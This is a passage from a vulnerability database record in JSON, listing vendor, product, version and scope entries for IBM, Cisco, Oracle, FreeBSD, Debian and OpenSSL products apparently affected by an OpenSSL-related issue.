"scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.26" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70100" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.3(1)" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.12" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.2" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5(.1.131)" }, { "model": "project openssl 1.0.2d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.3" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.1(1)" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "algo audit and compliance if", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.32" }, { "model": "spa525g", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.4" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "9.3-release-p25", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "abyp-0t-2s-2l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.1" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9971" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.29-9" }, { "model": "series ip phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "nexus series switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "abyp-2t-0s-2l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "spa112 2-port phone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.5" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.6" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.1.1" }, { "model": "telepresence server mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70104.2" }, { "model": "webex messenger service", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.20" }, { "model": "abyp-10g-4sr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "media experience engines", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "10.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.2" }, { "model": "mysql enterprise backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.10" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3.1" }, { "model": "rational tau interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media players series 5.4 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "telepresence server on multiparty media mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3204.2" }, { "model": "connected grid router 15.6.2.15t", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "cloupia unified infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "hosted collaboration mediation fulfillment", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5:20" }, { "model": "jabber for mac", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "counter fraud management for safer payments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.0" }, { "model": "telepresence server on multiparty media mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3104.2" }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70006.2.17" }, { "model": "digital media players series 5.3 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.0" }, { "model": "project openssl 1.0.1n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3204.1" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "packet tracer", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.0" }, { "model": "network analysis module", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.3.1" }, { "model": "project openssl 1.0.1o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "unified wireless ip phone", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.5.1" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "virtual security gateway vsg2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1.0" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "policy suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "webex meetings client on premises", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-2.7" }, { "model": "10.2-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "spa51x series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.55" }, { "model": "unified ip conference phone for third-party call control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "unified intelligence center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "telepresence server on virtual machine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.4" }, { "model": "common services platform collector", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.9.1" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.7" }, { "model": "project openssl 1.0.2e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(3.10000.9)" }, { "model": "hosted collaboration mediation fulfillment", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "project openssl 1.0.1q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "dcm series 9900-digital content manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.3" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.2" }, { "model": "tivoli provisioning manager for os deployment intirim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.133" }, { "model": "telepresence sx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "webex meetings client hosted", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "webex meetings for wp8", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-108" }, { "model": "sterling connect:express for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(2.1)" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "webex meetings for wp8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.1" }, { "model": "physical access control gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "wide area application services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.5.7" }, { "model": "9.3-release-p24", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "webex messenger service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p19", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mmp server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.10" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application and content networking system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.5.41" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "10.1-release-p30", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.2.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "intelligent automation for cloud", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "0.9.8" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "edge digital media player 1.6rb4 5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "mds series multilayer switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "abyp-10g-4sr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "9.3-release-p36", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.6" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.1" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30002.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.10" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "webex meeting center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "partner supporting service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "mobility services engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.0" }, { "model": "edge digital media player", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3401.2.0.20" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1" }, { "model": "abyp-0t-4s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "spa30x series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "78000" }, { "model": "digital media players series 5.4 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.13" }, { "model": "10.2-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "42000" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "standalone rack server cimc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql enterprise backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.12.2" }, { "model": "tivoli netcool system service monitors fp14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "intracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "jabber for apple ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.2" }, { "model": "video surveillance series high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "40002.4.7" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.7" }, { "model": "9.3-release-p33", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.5" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.07" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "84200" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ironport email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.2" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "meetingplace", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "spa525g", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "mmp server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.0.5" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.0.1" }, { "model": "9.3-release-p41", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli netcool system service monitors fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "flex system fc3171 8gb san switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.8.01.00" }, { "model": "lancope stealthwatch udp director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence integrator c series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud object store", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.8" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "cognos business intelligence fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.12" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p25", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5.1.5" }, { "model": "registered envelope service", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.0" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "tivoli netcool system service monitors fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "telepresence content server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.2" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.5(4)" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3104.4" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "asa cx and prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50003.5.12.21" }, { "model": "project openssl 1.0.1m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(1)" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50007.3.1" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.5(3)" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3.0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "10.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8945" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.18-49" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(1.10000.12)" }, { "model": "telepresence ex series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.3" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "mate design", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "10.3-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.13-41" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.9" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network admission control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "identity services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.31" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.2.0" }, { "model": "10.1-release-p33", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "nexus series switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "telepresence conductor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "abyp-0t-0s-4l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "unified attendant console standard", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.0" }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mate live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5(.1.6)" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified workforce optimization sr3 es5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.0" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "unified communications manager 10.5 su3", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "abyp-2t-2s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.9.4" }, { "model": "application policy infrastructure controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.0(0.400)" }, { "model": "abyp-4tl-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "nac server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9-34" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.3.2" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": 